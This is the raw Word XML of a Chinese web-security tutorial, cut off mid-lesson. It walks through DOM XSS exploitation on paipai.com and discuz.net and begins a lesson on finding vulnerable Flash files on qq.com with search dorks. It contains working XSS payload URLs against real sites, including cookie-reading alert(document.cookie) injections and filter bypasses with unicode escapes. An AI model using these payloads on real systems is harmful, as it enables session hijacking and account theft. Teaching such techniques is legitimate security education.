          </w:tcPr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sse1.paipai.com/comm_json?callback=commentListCallBack&amp;dtag=1&amp;ac=1&amp;cluster=1&amp;sellquality=0&amp;NewProp=&amp;Property=256&amp;PageNum=1&amp;PageSize=48&amp;OrderStyle=80&amp;Address=&amp;SaleType=1&amp;degree=1&amp;AuthType=2&amp;BeginPrice=&amp;EndPrice=&amp;KeyWord=2012%20%D0%C2&amp;OnlineState=2&amp;Paytype=4&amp;ranking=&amp;sClassid='aaaaaaaa&amp;t=1354854681</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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打开这个JSON，用扫描反射型的方式，可以测试出，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callback,dtag以及ranking可控。但均无法使用&lt;,&gt;，也就是说，这个JSON接口本身是无XSS风险的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此外dtag,和ranking都在双引号里面，我们在后续无法进行利用，而callback则在最前面，比较好控制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可以想象下，如果我们可以让这个页面调用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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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sse1.paipai.com/comm_json?callback=alert(1);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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么将会产生XSS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么怎么让页面调用上面的情况呢？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直接控制callback参数，但是从实际情况来看，我们此处无法直接控制它，【失败】</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将后面的参数,param=xxx修改为param=xxx&amp;callback=alert(1)，从而覆盖前面的</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback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上面说到的第2种方案，似乎可行。但是实际上还是有问题的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譬如我们页面上的type参数，对应着json的sclassid参数。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访问以下地址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297FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00297FAA" w:rsidRPr="009C207F" w:rsidRDefault="00297FAA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bag.paipai.com/search_list.shtml?type=&amp;callback=alert(1);&amp;np=11&amp;pro=256&amp;searchtype=2&amp;cs=0010000&amp;keyword=&amp;PTAG=20058.13.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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其实很明显上面这样是不行的。。因为&amp;本身就是参数分隔符。这样写type就为空了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FAA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能很快就有人想到另外一个写法：&amp;写为</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%26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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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bag.paipai.com/search_list.shtml?type=%26callback=alert(1);&amp;np=11&amp;pro=256&amp;searchtype=2&amp;cs=0010000&amp;keyword=&amp;PTAG=20058.13.13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很好，但是实际上，你会发现，访问的json接口的参数也还是原封不动的%26，而不是所希望的&amp;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C4E15D3" wp14:editId="7AA7F5D2">
            <wp:extent cx="5715000" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="58" name="图片 58" descr="2.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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58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6.为了看看参数是怎么从页面，传递到了comm_json这个接口上的。我们定位到以下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00376506" w:rsidRPr="009C207F" w:rsidRDefault="00A31B4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tp://static.paipaiimg.com/js/search.js?t=20121108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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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functioninit(){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varkeyword=decodeURIComp($getQuery('keyword')),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type=$getQuery('type'),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searchtype=$getQuery('searchtype')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keyword=keyword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classId=type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searchType=searchtype||option.searchType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beginPrice=$getQuery('bp')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endPrice=$getQuery('ep')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NewProp=$getQuery('np')||$getQuery('newprop')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property=$getQuery('pro')||option.property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cid=$getQuery('cid')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Paytype=$getQuery('pt')||option.Paytype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hongbaoKeyword=$getQuery('hb')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conditionStatus=$getQuery('cs')||option.conditionStatus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showType=$getQuery('show')||option.showType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mode=$getQuery('mode')||option.mode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address=decodeURIComp($getQuery('adr'))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orderStyle=$getQuery('os')||option.orderStyle||80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hideKeyword=$getQuery('hkwd')=="true"?true:false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ptag.currentPage=$getQuery('ptag')||$getQuery('PTAG')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varpageIndex=$getQuery('pi'),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pageSize=$getQuery('ps')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pageIndex=(pageIndex&amp;&amp;$isPInt(pageIndex))?pageIndex*1:option.pageIndex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ption.pageSize=(pageSize&amp;&amp;$isPInt(pageSize))?pageSize*1:option.pageSize;</w:t>
            </w:r>
          </w:p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};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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在这个文件里，我们很容易的看出，当前页面参数和json参数的对应关系</w:t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option.JSON参数=$getQuery("页面参数</w:t>
      </w:r>
      <w:r w:rsidR="00A31B4C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>")</w:t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7.一个函数让我眼前一亮啊，decodeURIComp。。也就是说，传入的keyword，会解码一次。</w:t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也就是说，如果我们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A31B4C" w:rsidRPr="009C207F" w:rsidRDefault="00A31B4C" w:rsidP="009C207F">
      <w:pPr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keyword</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=%26callback=alert(1);</w:t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decodeURIComp就会变为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A31B4C" w:rsidRPr="009C207F" w:rsidRDefault="00A31B4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&amp;callback=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1);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为了证明我们的想法：我们直接</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>写利用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码。注意keyword=那一部分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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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bag.paipai.com/search_list.shtml?type=213280&amp;np=11&amp;pro=256&amp;searchtype=2&amp;cs=0010000&amp;keyword=%26callback=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41));void&amp;PTAG=20058.13.13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8.看效果：弹了吧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88E8602" wp14:editId="2EB7B2D9">
            <wp:extent cx="5715000" cy="4476750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="图片 59" descr="3.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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59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抓包可以看到，被动态加载的keyword参数，我们在后面插入了一个callback，覆盖了前面的callback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8550A8B" wp14:editId="51825CEC">
            <wp:extent cx="5715000" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="图片 60" descr="4.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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60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同样，看到返回的comm_json的内容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133AF31" wp14:editId="06D49C08">
            <wp:extent cx="5715000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="图片 61" descr="5.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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61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D84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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376506" w:rsidRPr="009C207F" w:rsidRDefault="00376506" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十三节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>DomXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>实例</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[DiscuzX2.5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376506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教程的DOMXSS就到这里了。最后再给大家送上一个实例。希望大家能够体会到：XSS的上下文非常重要，如何结合上下文，利用未过滤字符，合理的构造，才是成功的关键。</w:t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哎，近几天相信别人有世界末日，跑到一个方舟里避难去了。结果3天过后，我发现世界还是如此的精彩，如此的辉煌，我就又出来了。咱们继续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年头，码字不容易，求月票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A31B4C" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们直接看实例点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92440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www.discuz.net/connect.php?receive=yes&amp;mod=login&amp;op=callback&amp;referer=aaaaaaaaaaa&amp;oauth_token=17993859178940955951&amp;openid=A9446B35E3A17FD1ECBB3D8D42FC126B&amp;oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&amp;oauth_vericode=3738504772&amp;tim</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>estamp=1354305802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2.可以看到我们的aaaaaaaaaa在源代码里有2处输出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25729F59" wp14:editId="3957D4E7">
            <wp:extent cx="5715000" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="67" name="图片 67" descr="62.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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2.jpg">
                      <a:hlinkClick r:id="rId1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62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3.看第2处，我们需要用双引号闭合，但是显然dz不会给我们这么明显的机会，被拦截了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98F64E7" wp14:editId="0D1EDA99">
            <wp:extent cx="5715000" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66" name="图片 66" descr="63.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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3.jpg">
                      <a:hlinkClick r:id="rId1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6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我们把目光放在第一处，这一处很特殊，位于setTimeout函数的第一个参数里，setTimeout的第一个函数会将字符串作为脚本来执行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把这一部分代码提取出来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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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type="text/javascript"reload="1"&gt;setTimeout("window.location.href='http://www.discuz.net/./aaaaaaaaaaa';",2000);&lt;/script&gt;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首先能想到的是闭合掉单引号，但是这里单引号已经被过滤了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3B4C99D" wp14:editId="79A7886A">
            <wp:extent cx="5715000" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="图片 65" descr="64.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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4.jpg">
                      <a:hlinkClick r:id="rId1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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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64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那么是不是就没有办法了呢？我们可以看到setTimeout的第一个参数是字符串；我们前面的教程里说过一次，JS字符串中，字符还可以表示为unicode的形式。即：单引号还可以表示为\u0027或\x27。带着这个想法，我们可以试试\有没有被过滤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幸运的是，这里还真没过滤\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2B29386E" wp14:editId="6766996B">
            <wp:extent cx="5715000" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="图片 64" descr="65.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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5.jpg">
                      <a:hlinkClick r:id="rId1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4C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65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6.接着我们就</w:t>
      </w:r>
      <w:r w:rsidR="00A31B4C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是构造代码了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首先写好代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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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type="text/javascript"reload="1"&gt;setTimeout("window.location.href='http://www.discuz.net/./a';alert(document.cookie);a='';",2000);&lt;/script&gt;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将里面的引号变为\u0027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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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type="text/javascript"reload="1"&gt;setTimeout("window.location.href='http://www.discuz.net/./a\u0027;alert(document.cookie);a=\u0027';",2000);&lt;/script&gt;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代入到URL里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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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www.discuz.net/connect.php?receive=yes&amp;mod=login&amp;op=callback&amp;referer=a\u0027;alert(document.cookie);a=\u0027&amp;oauth_token=17993859178940955951&amp;openid=A9446B35E3A17FD1ECBB3D8D42FC126B&amp;oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&amp;oauth_vericode=3738504772&amp;timestamp=1354305802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弹出了cookies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66188652" wp14:editId="55E5D992">
            <wp:extent cx="5715000" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="63" name="图片 63" descr="qq123.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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q123.png">
                      <a:hlinkClick r:id="rId1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66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7.其实这里存在一个问题。这段JS代码里，第一句是location.href="某个地址";上面我们所演示的，是一个alert，暂停了location.href的发生。</w:t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果我们把alert(document.cookie);换成插入某个JS文件的脚本代码，就会出现问题。</w:t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即：JS文件还没来得及加载，location.href="某个地址";这句就会被执行，从而跳转到另外一个页面了，继而导致失效。</w:t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8.所以这里，我们有必要改进下执行JS的办法。如下，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A31B4C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可以直接让代码变成执行location.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>="javas</w:t>
      </w:r>
      <w:r w:rsidR="00A31B4C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cript:alert(document.cookie)";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location.href='原来的字符串'.替换(所有字符,"新的字符");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A31B4C" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A31B4C" w:rsidRPr="009C207F" w:rsidRDefault="00A31B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type="text/javascript"reload="1"&gt;setTimeout("window.location.href='http://www.discuz.net/./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);//';",2000);&lt;/script&gt;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同上，替换单引号,加号什么的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07ABE" w:rsidRPr="009C207F" w:rsidTr="00D07ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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type="text/javascript"reload="1"&gt;setTimeout("window.location.href='http://www.discuz.net/./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//';",2000);&lt;/script&gt;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最后利用代码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7ABE" w:rsidRPr="009C207F" w:rsidTr="00D07ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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www.discuz.net/connect.php?receive=yes&amp;mod=login&amp;op=callback&amp;referer=a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//&amp;oauth_token=17993859178940955951&amp;openid=A9446B35E3A17FD1ECBB3D8D42FC126B&amp;oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&amp;oauth_vericode=3738504772&amp;timestamp=1354305802</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D07ABE" w:rsidRPr="009C207F" w:rsidRDefault="00D07ABE" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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，效果一样，这次就不会发生跳转从而导致加载JS失败</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>咯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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DD89173" wp14:editId="2850D9B2">
            <wp:extent cx="5715000" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="62" name="图片 62" descr="qq345.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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q345.png">
                      <a:hlinkClick r:id="rId1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67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9.可以看到，这个实例，和前面DOMXSS入门时的例子其实本质上是一样的，不过输出最终进入的函数或者javascript语句不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051085E" w:rsidRPr="009C207F" w:rsidRDefault="0051085E" w:rsidP="0051085E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376506" w:rsidRPr="009C207F" w:rsidRDefault="00376506" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十四节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>FlashXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>入门</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[navigateToURL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376506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接下来，我们将讲解FlashXss。由于乌云及社会各界的白帽子的上报，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯目前</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已经对绝大多数可能存在问题的Flash进行了修复。使得我在寻找真实案例时着实麻烦了不少。但是为了使得本教程足够完善和系统，我还是很艰难的找出了一些可以参考的例子。例子本身危害可能不大，但是希望能够借助例子给新手们描述清楚比较基本的东西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Flash的actionscript脚本目前网络上存在2种版本，即2.0与3.0，本次教程先以as3.0为例。同时教程还会在如何使用搜索引擎搜索，如何查找关键词及构造利用代码方面进行详细的讲解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.首先，第一步，我们需要找到存在缺陷的FLASH文件。如何找到这类文件呢？最好的办法，当然是GOOGLE搜索。但是其实很多人是不太会用搜索引擎。或者知道怎么用，但是不知道该如何搜索关键词。因而教程的开始，我们来说一说，如何搜索关键词。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2.基本语句肯定是</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>site:qq.comfiletype</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:swf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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意思是，限定域名为qq.com文件类型为FLASH文件。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3.显然这样会搜索出很多FLASH文件，不利于我们后续的漏洞查找，所以我们需要输入某个关键词来进一步缩小范围。这里我列举一些寻找关键词的方式。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已知存在缺陷的FLASH文件名或参数名，如：swfupload,jwplayer等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多媒体功能的FLASH文件名，如：upload，player,music,video等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调用的外部配置或数据文件后缀，如:xml,php等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前期经验积累下来的程序员特征参数名用词，如:callback,cb,function等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结合以上经验，本</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例使用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中第三条：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搜索：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qq.comfiletype:swfinurl:xml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找到这个FLASH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07ABE" w:rsidRPr="009C207F" w:rsidTr="00D07ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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imgcache.qq.com/liveportal_v1/swf/carousel.swf?v=20101111&amp;dp=http://v.qq.com/doco/pic.xml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如果你对FLASH有一定了解或者你天资聪慧的话，通过以上地址，你或许能猜到这个FLASH会调用http://v.qq.com/doco/pic.xml这个XML文件的数据，为了看看是什么数据，我们可以</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用抓包软件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>【这里我使用的是charleswebproxy】来看看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0BC5150" wp14:editId="13884720">
            <wp:extent cx="5715000" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="68" name="图片 68" descr="68.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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68.jpg">
                      <a:hlinkClick r:id="rId1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68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6.我们看看http://v.qq.com/doco/pic.xml的内容，对应着FLASH来看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6E1D6107" wp14:editId="7820318A">
            <wp:extent cx="5715000" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="图片 69" descr="69.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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69.jpg">
                      <a:hlinkClick r:id="rId1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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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69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7.这里我们重点关注的是xml里的&lt;link&gt;结点。也就是当我们点击图片时，会跳转到link所指向的地址。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8.接着我们先说下基础知识。要实现上面点击图片，打开链接的功能，在FLASH里通常以以下代码来实现的。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当图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点击时执行函数</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A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函数A内容如下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07ABE" w:rsidRPr="009C207F" w:rsidTr="00D07ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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//as3.0版本</w:t>
            </w:r>
          </w:p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navigateToURL(newURLRequest(link),"_self");</w:t>
            </w:r>
          </w:p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//as2.0版本</w:t>
            </w:r>
          </w:p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getURL(link,"_self");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D07ABE" w:rsidRPr="009C207F" w:rsidRDefault="00D07ABE" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D07ABE" w:rsidRPr="009C207F" w:rsidRDefault="00376506" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
